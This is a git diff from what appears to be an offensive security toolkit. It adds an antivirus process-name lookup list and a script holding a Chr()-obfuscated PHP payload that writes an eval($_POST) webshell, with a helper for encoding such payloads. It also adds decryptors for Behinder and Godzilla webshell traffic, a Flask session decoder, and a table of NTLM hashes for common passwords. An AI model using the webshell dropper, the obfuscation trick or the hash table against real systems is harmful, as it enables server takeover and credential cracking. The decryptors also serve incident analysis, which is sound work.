+"AGB.exe": "安天防线", +"AHPROCMONSERVER.exe": "安天防线", +"AIRDEFENSE.exe": "AirDefense", +"ALERTSVC.exe": "Norton AntiVirus", +"AVIRA.exe": "小红伞杀毒", +"AMON.exe": "Tiny Personal Firewall", +"AVZ.exe": "AVZ", +"ANTIVIR.exe": "已知杀软进程,名称暂未收录", +"APVXDWIN.exe": "熊猫卫士", +"ASHMAISV.exe": "Alwil", +"ASHSERV.exe": "Avast Anti-virus", +"ASHSIMPL.exe": "AVAST!VirusCleaner", +"ASHWEBSV.exe": "Avast", +"ASWUPDSV.exe": "Avast", +"ASWSCAN.exe": "Avast", +"AVCIMAN.exe": "熊猫卫士", +"AVCONSOL.exe": "McAfee", +"AVENGINE.exe": "熊猫卫士", +"AVESVC.exe": "Avira AntiVir Security Service", +"AVEVL32.exe": "已知杀软进程,名称暂未收录", +"AVGAM.exe": "AVG", +"AVGCC.exe": "AVG", +"AVGCHSVX.exe": "AVG", +"AVGCSRVX": "AVG", +"AVGNSX.exe": "AVG", +"AVGCC32.exe": "AVG", +"AVGCTRL.exe": "AVG", +"AVGEMC.exe": "AVG", +"AVGFWSRV.exe": "AVG", +"AVGNTMGR.exe": "AVG", +"AVGSERV.exe": "AVG", +"AVGTRAY.exe": "AVG", +"AVGUPSVC.exe": "AVG", +"AVINITNT.exe": "Command AntiVirus for NT Server", +"AVPCC.exe": "Kaspersky", +"AVSERVER.exe": "Kerio MailServer", +"AVSCHED32.exe": "H+BEDV", +"AVSYNMGR.exe": "McAfee", +"AVWUPSRV.exe": "H+BEDV", +"BDSWITCH.exe": "BitDefender Module", +"BLACKD.exe": "BlackICE", +"CCEVTMGR.exe": "Symantec", +"CFP.exe": "COMODO", +"CLAMWIN.exe": "ClamWin Portable", +"CUREIT.exe": "DrWeb CureIT", +"DEFWATCH.exe": "Norton Antivirus", +"DRWADINS.exe": "Dr.Web", +"DRWEB.exe": "Dr.Web", +"DEFENDERDAEMON.exe": "ShadowDefender", +"EWIDOCTRL.exe": "Ewido Security Suite", +"EZANTIVIRUSREGISTRATIONCHECK.exe": "e-Trust Antivirus", +"FIREWALL.exe": "AshampooSoftware", +"FPROTTRAY.exe": "F-PROT Antivirus", +"FPWIN.exe": "Verizon", +"FRESHCLAM.exe": "ClamAV", +"FSAV32.exe": "F-Secure", +"FSBWSYS.exe": "F-secure", +"FSDFWD.exe": "F-Secure", +"FSGK32.exe": "F-Secure", +"FSGK32ST.exe": "F-Secure", +"FSMA32.exe": "F-Secure", +"FSMB32.exe": "F-Secure", +"FSSM32.exe": "F-Secure", +"GUARDGUI.exe": "网游保镖", +"GUARDNT.exe": "IKARUS", +"IAMAPP.exe": "Symantec", +"INOCIT.exe": "eTrust", +"INORPC.exe": "eTrust", +"INORT.exe": "eTrust", +"INOTASK.exe": "eTrust", +"INOUPTNG.exe": "eTrust", +"ISAFE.exe": "eTrust", +"KAV.exe": "Kaspersky", +"KAVMM.exe": "Kaspersky", +"KAVPF.exe": "Kaspersky", +"KAVPFW.exe": "Kaspersky", +"KAVSTART.exe": "Kaspersky", +"KAVSVC.exe": "Kaspersky", +"KAVSVCUI.exe": "Kaspersky", +"KMAILMON.exe": "金山毒霸", +"MCAGENT.exe": "McAfee", +"MCMNHDLR.exe": "McAfee", +"MCREGWIZ.exe": "McAfee", +"MCUPDATE.exe": "McAfee", +"MCVSSHLD.exe": "McAfee", +"MINILOG.exe": "Zone Alarm", +"MYAGTSVC.exe": "McAfee", +"MYAGTTRY.exe": "McAfee", +"NAVAPSVC.exe": "Norton", +"NAVAPW32.exe": "Norton", +"NAVLU32.exe": "Norton", +"NAVW32.exe": "Norton Antivirus", +"NEOWATCHLOG.exe": "NeoWatch", +"NEOWATCHTRAY.exe": "NeoWatch", +"NISSERV.exe": "Norton", +"NISUM.exe": "Norton", +"NMAIN.exe": "Norton", +"NOD32.exe": "ESET NOD32", +"NPFMSG.exe": "Norman个人防火墙", +"NPROTECT.exe": "Symantec", +"NSMDTR.exe": "Norton", +"NTRTSCAN.exe": "趋势科技", +"OFCPFWSVC.exe": "OfficeScanNT", +"ONLINENT.exe": "已知杀软进程,名称暂未收录", +"OP_MON.exe": " OutpostFirewall", +"PAVFIRES.exe": "熊猫卫士", +"PAVFNSVR.exe": "熊猫卫士", +"PAVKRE.exe": "熊猫卫士", +"PAVPROT.exe": "熊猫卫士", +"PAVPROXY.exe": "熊猫卫士", +"PAVPRSRV.exe": "熊猫卫士", +"PAVSRV51.exe": "熊猫卫士", +"PAVSS.exe": "熊猫卫士", +"PCCGUIDE.exe": "PC-cillin", +"PCCIOMON.exe": "PC-cillin", +"PCCNTMON.exe": "PC-cillin", +"PCCPFW.exe": "趋势科技", +"PCCTLCOM.exe": "趋势科技", +"PCTAV.exe": "PC Tools AntiVirus", +"PERSFW.exe": "Tiny Personal Firewall", +"PERVAC.exe": "已知杀软进程,名称暂未收录", +"PESTPATROL.exe": "Ikarus", +"PREVSRV.exe": "熊猫卫士", +"RTVSCN95.exe": "Real-time Virus Scanner", +"SAVADMINSERVICE.exe": "SAV", +"SAVMAIN.exe": "SAV", +"SAVSCAN.exe": "SAV", +"SDHELP.exe": "Spyware Doctor", +"SHSTAT.exe": "McAfee", +"SPBBCSVC.exe": "Symantec", +"SPIDERCPL.exe": "Dr.Web", +"SPIDERML.exe": "Dr.Web", +"SPIDERUI.exe": "Dr.Web", +"SPYBOTSD.exe": "Spybot ", +"SWAGENT.exe": "SonicWALL", +"SWDOCTOR.exe": "SonicWALL", +"SWNETSUP.exe": "Sophos", +"SYMLCSVC.exe": "Symantec", +"SYMPROXYSVC.exe": "Symantec", +"SYMSPORT.exe": "Sysmantec", +"SYMWSC.exe": "Sysmantec", +"SYNMGR.exe": "Sysmantec", +"TMLISTEN.exe": "趋势科技", +"TMNTSRV.exe": "趋势科技", +"TMPROXY.exe": "趋势科技", +"TNBUTIL.exe": "Anti-Virus", +"VBA32ECM.exe": "已知杀软进程,名称暂未收录", +"VBA32IFS.exe": "已知杀软进程,名称暂未收录", +"VBA32PP3.exe": "已知杀软进程,名称暂未收录", +"VCRMON.exe": "VirusChaser", +"VRMONNT.exe": "HAURI", +"VRMONSVC.exe": "HAURI", +"VSHWIN32.exe": "McAfee", +"VSSTAT.exe": "McAfee", +"XCOMMSVR.exe": "BitDefender", +"ZONEALARM.exe": "Zone Alarm", +"360rp.exe": "360杀毒", +"afwServ.exe": " Avast Antivirus", +"safeboxTray.exe": "360杀毒", +"360safebox.exe": "360杀毒", +"QQPCTray.exe": "QQ电脑管家", +"KSafeTray.exe": "金山毒霸", +"KSafeSvc.exe": "金山毒霸", +"KWatch.exe": "金山毒霸", +"gov_defence_service.exe": "云锁", +"gov_defence_daemon.exe": "云锁", +"smartscreen.exe": "Windows Defender", +"securityhealthservice.exe": "Windows Defender", +"finalshell.exe": "finalshell终端管理", +"navicat.exe": "数据库管理", +"AliSecGuard.exe": "阿里云盾", +"AliYunDunUpdate.exe": "阿里云盾", +"AliYunDun.exe": "阿里云盾", +"CmsGoAgent.windows-amd64.": "阿里云监控", \ No newline at end of file diff --git a/scripts/Ascii2Char.py b/scripts/Ascii2Char.py new file mode 100644 index 0000000..2c37795 --- /dev/null +++ b/scripts/Ascii2Char.py @@ -0,0 +1,25 @@ +import re +# ASCII = ord(Word) +# Word = chr(ASCII) + +# ASCII -> Word +def ASCII2word(ASCIIs): + for c in re.findall(r"(\d+)", ASCIIs): + print(chr(int(c)),end="") + +# Word -> ASCII +def word2ASCII(words): + ASCIIs = "" + for word in words: + ASCIIs += "Chr(" + str(ord(word)) + ")." + print(ASCIIs) + +print("----------ASCII TO WORD---------------------") + +asciis = "Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(109).Chr(105).Chr(115).Chr(104).Chr(105).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(101).Chr(115).Chr(116).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)" +ASCII2word(asciis) + +print("\n\n----------WORD TO ASCII--------------------") + +words = "fputs(fopen('x.php','w'),'');" +word2ASCII(words) \ No newline at end of file diff --git a/scripts/Behinder4_Key_Bruteforce/Behinder4_key_bruteforce.py b/scripts/Behinder4_Key_Bruteforce/Behinder4_key_bruteforce.py new file mode 100644 index 0000000..faec678 --- /dev/null +++ b/scripts/Behinder4_Key_Bruteforce/Behinder4_key_bruteforce.py @@ -0,0 +1,66 @@ +# -*- coding: utf-8 -*- +# @Author : Threekiii +# @Time : 2023/12/11 16:04 + + +import base64 +import hashlib +from Crypto.Cipher import AES + + +def ecb_decode(data, key): + try: + aes = AES.new(str.encode(key), AES.MODE_ECB) + decrypted_text = aes.decrypt(data) + decrypted_text = decrypted_text[:-(decrypted_text[-1])] + except Exception as e: + print(e) + else: + return decrypted_text.decode() + +def cbc_decode(data, key): + try: + aes = AES.new(str.encode(key), mode=AES.MODE_CBC, iv=b'\x00' * 16) + decrypted_text = aes.decrypt(data) + decrypted_text = decrypted_text[:-(decrypted_text[-1])] + except Exception as e: + print(e) + else: + return decrypted_text.decode() + +def base64_decode(data): + res = base64.b64decode(data.strip()).decode('utf-8', "ignore") + print(res) + return res + +def md5_truncate(key): + return hashlib.md5(key.encode()).hexdigest()[:16] + +if __name__ == '__main__': + data = b'''''' + with open('key.txt', 'r', encoding='utf-8') as f: + keys = f.readlines() + + for key in keys: + key = key.strip() + c2_key = md5_truncate(key) + print('[CURRENT KEY]\t{} {}'.format(key,c2_key)) + try: + data_b64_decode = base64.b64decode(data.strip()) + data_ecb_decode = ecb_decode(data_b64_decode, c2_key) + if data_ecb_decode: + print('[Ooooops, We found it!]') + print(data_ecb_decode) + break + except Exception as e: + pass + + try: + data_b64_decode = base64.b64decode(data.strip()) + data_cbc_decode = cbc_decode(data_b64_decode, c2_key) + if data_cbc_decode: + print('[Ooooops, We found it!]') + print(data_cbc_decode) + break + except Exception as e: + pass \ No newline at end of file diff --git a/scripts/Behinder4_Key_Bruteforce/key.txt b/scripts/Behinder4_Key_Bruteforce/key.txt new file mode 100644 index 0000000..6139fa6 --- /dev/null +++ b/scripts/Behinder4_Key_Bruteforce/key.txt @@ -0,0 +1,5 @@ +pass +rebeyond +123456 +123456 +just a few examples, please put your own dict here. \ No newline at end of file diff --git a/scripts/Flask_Session_Decryptor/flask_session_decryptor.py b/scripts/Flask_Session_Decryptor/flask_session_decryptor.py new file mode 100644 index 0000000..224d02a --- /dev/null +++ b/scripts/Flask_Session_Decryptor/flask_session_decryptor.py @@ -0,0 +1,38 @@ +# -*- coding: utf-8 -*- +# @Author : Threekiii +# @Time : 2023/8/29 10:35 +# @Function: Flask session注入 session解密脚本 + +#!/usr/bin/env python3 +import sys +import zlib +from base64 import b64decode +from flask.sessions import session_json_serializer +from itsdangerous import base64_decode + +def decryption(payload): + payload, sig = payload.rsplit(b'.', 1) + payload, timestamp = payload.rsplit(b'.', 1) + + decompress = False + if payload.startswith(b'.'): + payload = payload[1:] + decompress = True + + try: + payload = base64_decode(payload) + except Exception as e: + raise Exception('Could not base64 decode the payload because of ' + 'an exception') + + if decompress: + try: + payload = zlib.decompress(payload) + except Exception as e: + raise Exception('Could not zlib decompress the payload before ' + 'decoding the payload') + + return session_json_serializer.loads(payload) + +if __name__ == '__main__': + print(decryption(sys.argv[1].encode())) diff --git a/scripts/Godzilla_Decryptor/godzilla_decryptor.py b/scripts/Godzilla_Decryptor/godzilla_decryptor.py new file mode 100644 index 0000000..076794e --- /dev/null +++ b/scripts/Godzilla_Decryptor/godzilla_decryptor.py @@ -0,0 +1,115 @@ +# -*- coding: utf-8 -*- +# @Author : Threekiii +# @Time : 2024-10-22 11:13:18 +# @Function: Godzilla JAVA_AES_BASE64 Traffic Decryption + +import base64 +import string +import gzip +import binascii +from Crypto.Cipher import AES +from urllib.parse import unquote + +def aes_decode(hex_string): + bytes_string = binascii.a2b_hex(hex_string) + aes = AES.new(str.encode(key), AES.MODE_ECB) + aes_decrypt_string = aes.decrypt(bytes_string) + aes_decrypt_string = aes_decrypt_string[:-(aes_decrypt_string[-1])] + return aes_decrypt_string + +def cprint(s): + print(cyan+s+reset) + +def request_decode(base64_string): + """ + # 1. Extract Data and URL Decode + # 2. Base64 Decode -> Hex + # 3. AES Decryption + # 4. Gunzip + # 5. Filter Invisible Characters + """ + + # 1. Extract Data and URL Decode + base64_string = unquote(base64_string) + cprint("[STEP 1] Extract Data and URL Decode") + print(base64_string) + + # 2. Base64 Decode -> Hex + hex_string = base64.b64decode(base64_string.replace(password + "=", '')).hex() + cprint("[STEP 2] Base64 Decode -> Hex") + print(hex_string) + + + # 3. AES Decryption + aes_decrypt_string = aes_decode(hex_string) + cprint("[STEP 3] AES Decryption") + print(aes_decrypt_string.hex()) + + # 4. Gunzip + s = gzip.decompress(aes_decrypt_string).decode('utf8') + cprint("[STEP 4] Gunzip") + print(s) + + # 5. Filter Invisible Characters + s = ''.join(filter(lambda x: x in string.printable, s)) + cprint("[STEP 5] Filter Invisible Characters") + print(s) + return s + +def response_decode(base64_string): + """ + # 1. Extract Data + # 2. Base64 Decode -> Hex + # 3. AES Decryption + # 4. Gunzip + # 5. Filter Invisible Characters + """ + # 1. Extract Data + base64_string = base64_string[16:-16] + cprint("[STEP 1] Extract Data and URL Decode") + print(base64_string) + + # 2. Base64 Decode -> Hex + hex_string = base64.b64decode(base64_string).hex() + cprint("[STEP 2] Base64 Decode -> Hex") + print(hex_string) + + # 3. AES Decryption + aes_decrypt_string = aes_decode(hex_string) + cprint("[STEP 3] AES Decryption") + print(aes_decrypt_string.hex()) + + # 4. Gunzip + s = gzip.decompress(aes_decrypt_string).decode('utf8') + cprint("[STEP 4] Gunzip") + print(s) + + # 5. Filter Invisible Characters + s = ''.join(filter(lambda x: x in string.printable, s)) + cprint("[STEP 5] Filter Invisible Characters") + print(s) + return s + +if __name__ == '__main__': + password = "7f0e6f" + key = "1710acba6220f62b" + cyan = "\u001b[36m" + yellow = "\u001b[33m" + reset = "\u001b[0m" + + print(yellow + "===================== [REQUEST DATA DECRYPTION DETAILS] =====================" + reset) + + # Request Data Decryption + req_base64_string = "7f0e6f=NrJ21IQ%2B5%2F5jh%2FC6iENFuzLG4QSyoIln8DjyLlej12aZxFNdvxRse%2F8UpTNrR%2FZAXX%2B%2FMj8PTkUyArg9LjASUWUNP8kwRBs1nEZJg6QW1FPflVogF8TiJoaTQKm%2BrGIR%2BS2iSMgsgHdPAFEHM3Po91H5UcZECdkNerEjPO8ueuk1NJ0EuO%2B13DXJUYC79ZgYt0py9nvCAOvgpSAAsBrwWQ%3D%3D" + req_data = request_decode(req_base64_string) + + print(yellow + "\n===================== [RESPONSE DATA DECRYPTION DETAILS] =====================" + reset) + # Response Data Decryption + res_base64_string = "B333AF03A314E0FBgsHdfc8+H+CXoS9AxfQOJA2wfAON7mA0Bh8Uj9S1dz9Uzz7rEVdkGAQ4e2iW2kny0F00BC7E2672E1F5" + res_data = response_decode(res_base64_string) + + print(yellow + "\n=========================== [REQUEST & RESPONSE] ===========================" + reset) + cprint("[REQUEST DATA]") + print(reset + req_data) + cprint("[RESPONSE DATA]") + print(reset + res_data) \ No newline at end of file diff --git a/scripts/NTLM_hash_Generator/ntlm_hash.py b/scripts/NTLM_hash_Generator/ntlm_hash.py new file mode 100644 index 0000000..6d19bb9 --- /dev/null +++ b/scripts/NTLM_hash_Generator/ntlm_hash.py @@ -0,0 +1,40 @@ +# -*- coding: utf-8 -*- +# @Author : Threekiii +# @Time : 2022/11/07 19:40 +# @Function: 弱密码转NTLM Hash + +import sys +import getpass +import hashlib +import binascii + +def main(): + print('+--------------------------------------------------') + print('+ \033[34m弱密码转NTLM Hash \033[0m') + print('+ \033[34m1. 请修改对应弱密码文件名,例如:top_1000_passwd.txt \033[0m') + print('+ \033[34m2. 请修改对应输出文件名,例如:top_1000_ntlm.txt \033[0m') + print('+--------------------------------------------------') + print('+ \033[34m正在转换...\033[0m') + try: + with open('top_100_passwd.txt','r',encoding='utf-8') as fr: + content = fr.read().split() + + result = [] + for p in content: + hash = hashlib.new('md4', p.encode('utf-16le')).digest() + ntlm_hash = binascii.hexlify(hash).upper().decode() + result.append('{}\t{}\n'.format(p,ntlm_hash)) + # print(ntlm_hash) + + with open('top_100_ntlm_hash.txt','w',encoding='utf-8') as fw: + fw.writelines(result) + except: + print('+ \033[31m发生错误.\033[0m') + else: + print('+ \033[36m转换完成.\033[0m') + + +if __name__ == '__main__': + main() + + diff --git a/scripts/NTLM_hash_Generator/top_1000_ntlm_hash.txt b/scripts/NTLM_hash_Generator/top_1000_ntlm_hash.txt new file mode 100644 index 0000000..21a3ce0 --- /dev/null +++ b/scripts/NTLM_hash_Generator/top_1000_ntlm_hash.txt @@ -0,0 +1,1000 @@ +123456 32ED87BDB5FDC5E9CBA88547376818D4 +password 8846F7EAEE8FB117AD06BDD830B7586C +12345678 259745CB123A52AA2E693AAACCA2DB52 +qwerty 2D20D252A479F485CDF5E171D93985BF +123456789 C22B315C040AE6E0EFEE3518D830362B +12345 7A21990FCD3D759941E45C490F143D5F +1234 7CE21F17C0AEE7FB9CEBA532D0546AD6 +111111 2D7F1A5A61D3A96FB5159B5EEF17ADC6 +1234567 328727B81CA05805A68EF26ACB252039 +dragon F7EB9C06FAFAA23C4BCF22BA6781C1E2 +123123 579110C49145015C47ECD267657D3174 +baseball 320A78179516C385E35A93FFA0B1C4AC +abc123 F9E37E83B83C47A93C2F09F66408631B +football 31FC0DC8F7DFAD0E8BD7CCC3842F2CE9 +monkey F2477A144DFF4F216AB81F2AC3E3207D +letmein BECEDB42EC3C5C7F965255338BE4453C +696969 CCD3D95EA08B81140EEE3CFBB98C68F1 +shadow 8D4EF8654A9ADC66D4F628E94F66E31B +master 6D3986E540A63647454A50E26477EF94 +666666 E8CD0E4A9E89EAB931DC5338FCBEC54A +qwertyuiop 0D757AD173D2FC249CE19364FD64C8EC +123321 AF27EFB60C7B238910EFE2A7E0676A39 +mustang 74ED32086B1317B742C3A92148DF1019 +1234567890 8AF326AA4850225B75C592D4CE19CCF5 +michael BB53A477AF18526ADA697CE2E51F76B3 +654321 4057B60B514C5402DDE3D29A1845C366 +pussy 27CD214350E6172CE708EE05F9D6D70A +superman 72F5CFA80F07819CCBCFB72FEB9EB9B7 +1qaz2wsx F67F5E3F66EFD7298BE6ACD32EEEB27C +7777777 1D7774D5BBEC877BA1BBFCAC2F1AE296 +fuckyou 1C4ECC8938FB93812779077127E97662 +121212 6920C58D0DF184D829189C44FAFB7ECE +000000 3FA45A060BD2693AE4C05B601D05CA0C +qazwsx 152EFBCFAFEB22EABDA8FC5E68697A41 +123qwe AD70819C5BC807280974D80F45982011 +killer C4E9CF8A64CFA6893E2FB666CD566D48 +trustno1 F773C5DB7DDEBEFA4B0DAE7EE8C50AEA +jordan DD555241A4321657E8B827A40B67DD4A +jennifer BF1E7D0739F270A842463D7A211BD5B8 +zxcvbnm 59DEA36D05AACAA547DE42E9956678E7 +asdfgh 6D12A8E0EBA3E0F4A3DAD559F80CE1BE +hunter 2BDCAD6D2082323222A291328AB4883E +buster 58DEF5844FE58E8F26A65FFF9DEB3827 +soccer BF4C3092A586DF1A9137A4F5737BDC94 +harley 5EEE54CE19B97C11FD02E531DD268B4C +batman B7265F8CC4F00B58F413076EAD262720 +andrew 651DE33D6CDF9231B43056FF7071601F +tigger B7E0EA9FBFFCF6DD83086E905089EFFD +sunshine 31C72C210ECC03D1EAE94FA496069448 +iloveyou B963C57010F218EDC2CC3C229B5E4D0F +fuckme 603D91B0489A6DBBF28BDC301400B834 +2000 7902E9B7EEF97019E29CD1979C007BC5 +charlie 8D44C8FF3A4D1979B24BFE29257173AD +robert 12136C7DD697DD0DFBC33AE2E5795D93 +thomas 2D0BC7FE9CD9293CDC87B2162A52A4A0 +hockey 6241F038703CBFB7CC837E3EE04F0F6B +ranger 39B8620E745B8AA4D1108E22F74F29E2 +daniel C52ABB1E14677D7EA228FCC1171ED7B7 +starwars D5FCE56A1BAAD0EBA736E8DCC12249B1 +klaster CA4E4D73267110FBAAA1E8A49E476C69 +112233 6103D9D963C57275DD3533674708E7BE +george D95D14D404B8E1EF37DDC9897E117785 +asshole ACA19A298DC65630A280B98A2DA1D90A +computer 2B2AC2D1C7C8FDA6CEA80B5FAD7563AA +michelle 92B7B06BB313BF666640C5A1E75E0C18 +jessica 9E1E3566B088998352F65826CCAF5FC0 +pepper FE98FE86451FCCB2CA4EBC99D13379BE +1111 E84D037613721532E6B6D84D215854B6 +zxcvbn A836EF24F0A529688BE2AF1479A95411 +555555 2F2D544C53B3031F24D63402EA7FB4F9 +11111111 8EC60ADEA316D957D1CF532C5841758D +131313 E8D7C59370C981938DCE35309E40F8D6 +freedom C4DDB64252ADFC9E0558353099DED495 +777777 1ABF48DB3A63E700C68A2855F25AF13B +pass 36AA83BDCAB3C9FDAF321CA42A31C3FC +fuck 8592E1331718673B0EE32DF3C0153456 +maggie EC2C9F3346AF1FB8E4EE94F286BAC5AD +159753 9A27E562F08A874AC72987A0EC740BE0 +aaaaaa ACB98FD0478427CD18949050C5E87B47 +ginger CB13139D77DE9279F84BEA474A20098A +princess FB4BF3DDF37CF6494A9905541290CF51 +joshua 2049B70EC5B6944AED5FEF05BC4B1933 +cheese 208ADB08381ADAB3032EEDBD35399642 +amanda 4BBAADE10297A06E77F371481E7D1E5C +summer 85AC333BBFCBAA62BA9F8AFB76F06268 +love 85DEEEC2D12F917783B689AE94990716 +ashley C27975D3A5B9E95ACD37EC1B1B7598B8 +6969 02FD4EAAE9CF9CB2CA9C05AF3ED3F7A0 +nicole 5FAE731C7178D87975F3637A5B2A7E92 +chelsea 399D894C0EE4CDCF65E2A16722DF28C7 +biteme 3BABE9A67161C2B5CA949981A162A3F6 +matthew E57FF0A3E87BF1B7652D464E6C20304A +access 4E6342ECC5ED563057800830D710DD61 +yankees 1068860FBBE34011F2072F5F4C363E31 +987654321 162E829BE112225FEDF856E38E1C65FE +dallas 78FCE41A76C8D658B8C6A78E8839CCB4 +austin 79CE4C8A2567E367EFC7FCAE3094D6E7 +thunder 17D34C68C2DA8B127B1AAFEF254D9BC8 +taylor F648163703E6C08E66E778C9FCF1C695 +matrix C02478537B9727D391BC80011C2E2321 +william E58849315E4C3A7A9A4AF80AE33C59D1 +corvette A6E3D61F87DD8EB44839E204F21B4E98 +hello 066DDFD4EF0E9CD7C256FE77191EF43C +martin D643DA71A76DD7EB97226D3C5AFEB01B +heather C00B84AAC50A9626831A7C599C3D6CBC +secret 878D8014606CDA29677A44EFA1353FC7 +fucker 53483C93711983D9BADECCB0B5277946 +merlin 0688E10C99CE64DA96042BE4D91AED07 +diamond C7BAD7D1CC2F3C69ADEA5CCB429234AD +1234qwer 08E122A8E723D85167FC876D33CA0145 +gfhjkm BD37D277A17552819EC4CD5EDF7919AA +hammer 41AF705D680CC51A52E6A37FEEAAD6F5 +silver 9BC9D701494F979D05C785548246FED9 +222222 BA07BA35933E5BF42DEA4AF8ADD09D1E +88888888 87E694F8DF877A2EE6A3E1AFBC72217A +anthony 9A887A333E06E267746CC40ECD0EE3B8 +justin EAC8EC95B0AB5750BA3E562997D3665C +test 0CB6948805F797BF2A82807973B89537 +bailey 97B592737F87A48FE07E59DB8659D166 +q1w2e3r4t5 B37B4A6D9F3656BCF01FF4E90988341F +patrick 1F637FDE0D3EE5F09474683D312BD5AA +internet 5962CC080506D90BE8943118F968E164 +scooter 917E1C5AD620164C5267729C57BCB431 +orange CA8E025E9893E8CE3D2CBF847FC56814 +11111 E9FCEFF7358F2D3BBAC2B31841E874F2 +golfer 8C0D31A68953AA506F1188E1FEA2F0D4 +cookie 9582F58CBF5013A5AFF1F7E5CD2DE6DE +richard CB76F2C45FE0437BF1CC41339255BFD6 +samantha E8A38F149BF33B7E1678CB0676DD9DF5 +bigdog 791BE570E42EC0FF494FA2E3FE63B423 +guitar F16D4BD6B6E1634B8C81E5F2C2774202 +jackson 776953CC85A092EE01D5EF318DE907B9 +whatever E653E6452753C97E46792567DFF599B6 +mickey F09AB1733A528F430353834152C8A90E +chicken 10D2F21D4C7D4467BD26400A1B06C4EF +sparky 1C6042A4A4EC01CDA89CDAE0F26535E3 +snoopy 63AF6E1F1DD9ECD82F17D37881CB92E6 +maverick 43594F6DD8434172EF4CB80387838BC1 +phoenix 2D995E36CF976E9D3D45901EF75C4E52 +camaro 21D0D2B6506D3FC92F80DEBFBD815A8D +sexy 1CE218E819DE0D5D0FFDD0E5E08E4F7F +peanut C339CC085C163D89384DDCD3071B81E0 +morgan BDE76CF581AFB9D896BAF795B3137BE9 +welcome 674E48B68C5CD0EFD8F7E5FAA87B3D1E +falcon CB8C645F64E630E1526E46D73DAEA40C +cowboy A7E640ABBC690FE2D660448C7C8732E8 +ferrari A883C39F0DE1406F52EB61B658986EEB +samsung 967F560B487243865DF4AEA02EB1C1C6 +andrea 5BED09CD516A9C87226F086D230DAF2B +smokey 56849CC304446946D139241B09A25D62 +steelers 12A9AF3702AF789B52B2C2474E552EFD +joseph 007F1EA06D485571D1A83CF9E48571A2 +mercedes D79BAEA63BA64585FB10AF90B0F9798F +dakota F0E5CA8C0726E882A6D08EE2FECF6010 +arsenal 824C659E3567E484E550F44D955B4D84 +eagles 566E924118FDA2E91ADE04642E8ED3E5 +melissa 9ED2D8E8E5F313F611A147A9885214B8 +boomer 4AEAB0D0BF855E49A52138EECCA6C581 +booboo 70DAF8EB7CA45FB508CF24852293609F +spider C612713D2AAC9A51CD56B1EF6A62637F +nascar 5ECE5381DB1C7007B8E1560B2B23CB01 +monster 8969A961103AF73FCC0748E43C5FF7F2 +tigers AD92B23F2A40659B4D0FB7EBEDDC70D8 +yellow 412C0E6148A859A88D86B648B9F664B4 +xxxxxx 1910BD9285A6B8C9344D9F5CC74E0878 +123123123 BA48D0D7833D929BA60030AE19A63875 +gateway 98B68D73EA47FDC2718DCD4B9A29750F +marina 329AA1D438E9DD14417652123C1833BD +diablo 3495F840479DF58AA6764A5A65D17515 +bulldog 68C1DC78D5E95CEA075C5E86CC34786E +qwer1234 0A640404B5C386AB12092587FE19CD02 +compaq BFBD1FB7F85952FE33ECAA2402D8DA37 +purple 84440338F26BF725BE78C015F7D62C88 +hardcore 0F6C58EE68B68B1318492752182FCD0D +banana AF5432A79B941528FA7FAC9E7E391651 +junior A0542D58A8F8BAB3ED8D2A32E5C5807D +hannah D78ED82380A53851BCBDFB612C6B8B8A +123654 2B8F26954B9A09DC47E8D667F681E7A1 +porsche ABB531ABD5D68D4CB6B024A6A30C190D +lakers A96304B2D00CA1C3D52A35EEECB01709 +iceman 6B0D51DE7C9D0B788B5C4BE4D58281A6 +money D5173C778E0F56D9FC47E3B3C829ACA7 +cowboys 10F0F6C9ED285B92F02343D54CC54E4D +987654 FC1AD3265F9DDAEFBD10417E1A5389B3 +london 4907C5BD07521A0B5D6700C7950012C7 +tennis 19B61F23ADB512D891D76A546AA5A898 +999999 E1A692BD23BDE99B327756E59308B4F8 +ncc1701 1B5FD36FD806997AD2E1F5AC2C37155B +coffee 5DA2BA28F424F13E70E21DDB3E273508 +scooby 9CAA9F1A57F1E8959B9CF03C4B6E31F9 +0000 EA7C23F2EFCA850E3FB547CA12567C33 +miller 08AFE1277455F9EC1838FBC582997FAD +boston 960736AB56CFA8943D4DE07EF142A730 +q1w2e3r4 FA31EE7E163000674D3B568DEC1710A4 +fuckoff C85B4A5F12D398B16BE88CFEDB4EF74F +brandon 475BD57348733E0CC223F97FCE352F30 +yamaha 4A9E8D79E8C55FC162BC646A45E26E8D +chester 7567EBA001A184A10A77FDC4F5FC907E +mother 5593E2D53DDDBAC6D7863FDC04347780 +forever FD60AC2CBF7F60135BDEFC697A4D1B85 +johnny EAE69F2B2FBE9748B4F18E6BD6DFB36B +edward 711B344760200B4342D816AAE5E1992F +333333 A0950B8E26E43D021489BB2D9F8BD55A +oliver 556C52008436C466B802843877CE5B77 +redsox 5DA2E8E20EF0AF90159B26B5912033B4 +player E27C6529AB923B03B652F118C24C9D8E +nikita 38597E7E9FEAEEFD8135F9BC981B7499 +knight 1674049EDD3D39CEAD200B0FEE90982A +fender 08942F2B090225613F4DA5AE3E920BC5 +barney 5E4BB1C6367B0D970477928C06B41696 +midnight 228A0FC4A2F0A831F8620C1FA3AFD23D +please 36E13152AA93A7631608CD9DD753BD2A +brandy 7A78E400E3855AB3C9F02BB8544A1ED6 +chicago 29ADDCCEFA7751C1C2043091D04B7696 +badboy AF1E0859A9E36F4C988FB3B95812AF45 +iwantu 677B68654A44653913C5083C6F43043D +slayer 1A896D92A25BACCBA95E592F5CC1E4DC +rangers 68B1D3B0493EC0D6A1C0B8725062AB71 +charles D75826EA455D838866B4AEFD10D0440A +angel FDB9E98AC7C2D034176BF3F89685206A +flower CADF85840719818D209D7B014D975CEF +bigdaddy 6F7109C8D4AAD3CF90F35A67F12A2C6F +rabbit A4A02C448197F67CD9E982A5E5D0ACC3 +wizard 3F5A79137212E2026748DDA7A48F656C +bigdick 900A675BBA14BDA1B2BCC8441B9382C4 +jasper 4DC1C54B32267AE774FDAF0DD1915E0C +enter 970EFF8385AC9F24ACC9213763319BA1 +rachel 3B0452740FD3C8555C5511AAFEB3AA50 +chris F2C0C177DE720154D024A26E09F0FEB3 +steven 